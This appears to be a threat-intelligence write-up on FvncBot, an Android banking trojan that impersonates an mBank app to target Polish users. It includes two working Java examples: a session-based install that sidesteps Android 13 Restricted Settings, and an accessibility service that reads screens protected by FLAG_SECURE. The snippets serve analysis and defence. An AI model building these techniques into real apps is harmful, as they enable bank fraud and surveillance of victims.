FvncBot Mobile Malware
Security analysts have identified a previously undocumented Android banking trojan, FvncBot, that was written from scratch. Unlike many modern banking trojans that derive their capabilities from leaked codebases, this family follows its own architecture and techniques.
Disguised as a Trusted Polish Banking App
FvncBot is distributed as a fake security application from mBank, a Polish bank, and targets mobile banking users in Poland. The disguise, combined with functionality built for manipulating financial transactions, indicates that its operators are running targeted fraud campaigns.
Custom-Built Features for Financial Fraud
The malware carries a broad set of capabilities for capturing sensitive information and remotely controlling compromised devices. By abusing Android's accessibility services it performs keylogging, serves web-inject overlays, streams the screen, and provides hidden virtual network computing (HVNC), that is, remote control concealed from the victim, to carry out unauthorized banking activity.
For protection against analysis, FvncBot relies on the apk0day crypting service from Golden Crypt. The app the victim installs is only a loader that unpacks and deploys the embedded payload.
Bypassing Modern Android Restrictions
Once launched, the dropper tries to persuade the victim to install what looks like a Google Play component. Behind the prompt is a session-based install through Android's PackageInstaller API: packages installed this way are not treated as sideloaded, so the Restricted Settings protection introduced in Android 13, which blocks sideloaded apps from enabling an accessibility service, does not apply to the payload. The same trick has appeared in other recent campaigns.
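The following is an added illustration of what a "session-based" install looks like in code; it is not FvncBot's own code, and the asset name and broadcast action are assumptions. A dropper that holds REQUEST_INSTALL_PACKAGES can stage a second APK through PackageInstaller rather than handing it to the intent-based installer, and the installed package is then attributed to the dropper instead of being recorded as a sideload.

```java
// Added illustration of a session-based install (not FvncBot's code). Android 13
// Restricted Settings blocks the accessibility toggle for apps that arrived through
// the intent-based installer (ACTION_VIEW / ACTION_INSTALL_PACKAGE). A package
// installed through a PackageInstaller session is attributed to the installing app,
// so that block is not applied to it. Requires REQUEST_INSTALL_PACKAGES in the manifest.
import android.app.PendingIntent;
import android.content.Context;
import android.content.Intent;
import android.content.pm.PackageInstaller;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;

public final class SessionInstallDemo {
    // Assumed app-private action; the system fires it when the session completes.
    static final String ACTION_COMMITTED = "demo.SESSION_COMMITTED";

    /** Stages an APK bundled in the app's assets and commits it as an install session. */
    public static int installFromAsset(Context ctx, String assetName) throws IOException {
        PackageInstaller installer = ctx.getPackageManager().getPackageInstaller();
        PackageInstaller.SessionParams params = new PackageInstaller.SessionParams(
                PackageInstaller.SessionParams.MODE_FULL_INSTALL);
        int sessionId = installer.createSession(params);
        try (PackageInstaller.Session session = installer.openSession(sessionId)) {
            // Copy the payload into the session. Every stream opened with openWrite()
            // must be fsync'ed and closed before commit(), otherwise commit() fails.
            try (InputStream in = ctx.getAssets().open(assetName);
                 OutputStream out = session.openWrite("payload.apk", 0, -1)) {
                byte[] buf = new byte[64 * 1024];
                int n;
                while ((n = in.read(buf)) > 0) {
                    out.write(buf, 0, n);
                }
                session.fsync(out);
            }
            // The user still sees the system install prompt (this is what the victim
            // takes for a "Google Play component"), but the resulting package is
            // recorded as installed by this app, not as a sideload.
            Intent callback = new Intent(ACTION_COMMITTED).setPackage(ctx.getPackageName());
            PendingIntent pi = PendingIntent.getBroadcast(ctx, sessionId, callback,
                    PendingIntent.FLAG_MUTABLE | PendingIntent.FLAG_UPDATE_CURRENT);
            session.commit(pi.getIntentSender());
        }
        return sessionId;
    }
}
```

For defenders and analysts, the install attribution is the useful artifact: on Android 11 and later, `PackageManager.getInstallSourceInfo(pkg).getInstallingPackageName()` for the payload will name the dropper rather than a store, and a banking app or MDM agent can treat an accessibility service whose installer is not a known store as suspicious.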
While running, the malware posts log data to a server at naleymilva.it.com, letting the operators monitor bot activity in real time. Metadata embedded by the operators, such as the campaign identifier call_pl and the version string 1.0-P, points to Poland as the initial target and suggests that FvncBot is still early in its development.
Establishing Control Through Accessibility Abuse
After deployment, the malware prompts the user to grant it accessibility access. Once that is granted, it registers the device with a command server over HTTP and receives subsequent commands through Firebase Cloud Messaging (FCM).
Core Capabilities
Below are some of the primary supported functions:
- Initiate or terminate WebSocket sessions for remote control, enabling swipes, taps, and scrolling.
- Forward accessibility logs, installed app lists, and device info to the operators.
- Display or hide full‑screen overlays for data theft.
- Deliver malicious overlays crafted for specific banking applications.
- Validate accessibility status and log keystrokes.
- Retrieve pending instructions from the command server.
- Stream the device's screen using the MediaProjection API.
Overcoming Screenshot Restrictions With 'Text Mode'
One notable feature is a 'text mode' that lets the operators read screen content even when an app blocks screenshots and screen capture with FLAG_SECURE. FLAG_SECURE only prevents the window's pixels from being captured; an accessibility service still receives the window's view hierarchy, including field labels and values, as text. This gives the attacker precise context during a fraudulent transaction without needing a screenshot.
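To make the point concrete, here is an added example (not FvncBot's code) of how an accessibility service can dump a window that FLAG_SECURE keeps out of screenshots and MediaProjection. The view id in the comments is constructed for the example; the service's XML configuration (event types, `canRetrieveWindowContent`) is assumed to be in place.

```java
// Added illustration of a "text mode" (not FvncBot's code). FLAG_SECURE protects
// pixels; an enabled accessibility service still gets the view tree as text and
// resource ids, so the transaction screen is readable without a screenshot.
import android.accessibilityservice.AccessibilityService;
import android.view.accessibility.AccessibilityEvent;
import android.view.accessibility.AccessibilityNodeInfo;
import java.util.ArrayList;
import java.util.List;

public class TextModeDemoService extends AccessibilityService {

    @Override
    public void onAccessibilityEvent(AccessibilityEvent event) {
        // Delivered for the event types declared in the service's XML config,
        // e.g. TYPE_WINDOW_CONTENT_CHANGED / TYPE_WINDOW_STATE_CHANGED.
        AccessibilityNodeInfo root = getRootInActiveWindow();
        if (root == null) return;
        List<String> lines = new ArrayList<>();
        collectText(root, 0, lines);
        // lines now holds entries such as "  [com.example.bank:id/amount] 2 500,00 PLN"
        // (constructed example). A real implant would ship this to its C2.
    }

    /** Walks the node tree and records every node that exposes text or a description. */
    static void collectText(AccessibilityNodeInfo node, int depth, List<String> out) {
        if (node == null) return;
        CharSequence text = node.getText();
        CharSequence desc = node.getContentDescription();
        boolean hasText = text != null && text.length() > 0;
        boolean hasDesc = desc != null && desc.length() > 0;
        if (hasText || hasDesc) {
            String id = node.getViewIdResourceName(); // e.g. "com.example.bank:id/amount"
            // Password fields come back masked unless the user enabled "speak passwords";
            // keyloggers get those values from TYPE_VIEW_TEXT_CHANGED events instead.
            String shown = node.isPassword() ? "<password field>"
                                             : String.valueOf(hasText ? text : desc);
            out.add(indent(depth) + "[" + (id == null ? "?" : id) + "] " + shown);
        }
        for (int i = 0; i < node.getChildCount(); i++) {
            collectText(node.getChild(i), depth + 1, out);
        }
    }

    private static String indent(int depth) {
        StringBuilder sb = new StringBuilder();
        for (int i = 0; i < depth; i++) sb.append("  ");
        return sb.toString();
    }

    @Override
    public void onInterrupt() { }
}
```

The output is structured text keyed by resource id, which is exactly what an operator needs to recognise a transfer screen and pick the amount or recipient field; no OCR is involved, so FLAG_SECURE is irrelevant. On the defensive side, Android 14 lets a banking app mark views with `android:accessibilityDataSensitive="yes"` so that only services declaring themselves accessibility tools receive them, but because a sideloaded service can declare that flag itself, this raises the bar rather than closing the gap.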
Distribution Still Unclear
The current infection method remains unknown. However, Android banking trojans frequently rely on SMS phishing campaigns and unofficial app stores, making those likely vectors for this family as well.
A Growing Threat That May Expand Beyond Poland
Because Android's accessibility service provides deep insight into user activity and the ability to manipulate on‑screen content, it remains a powerful tool for attackers. Although this sample focuses on Polish-speaking users, its operators could easily switch to new regions or impersonate other institutions.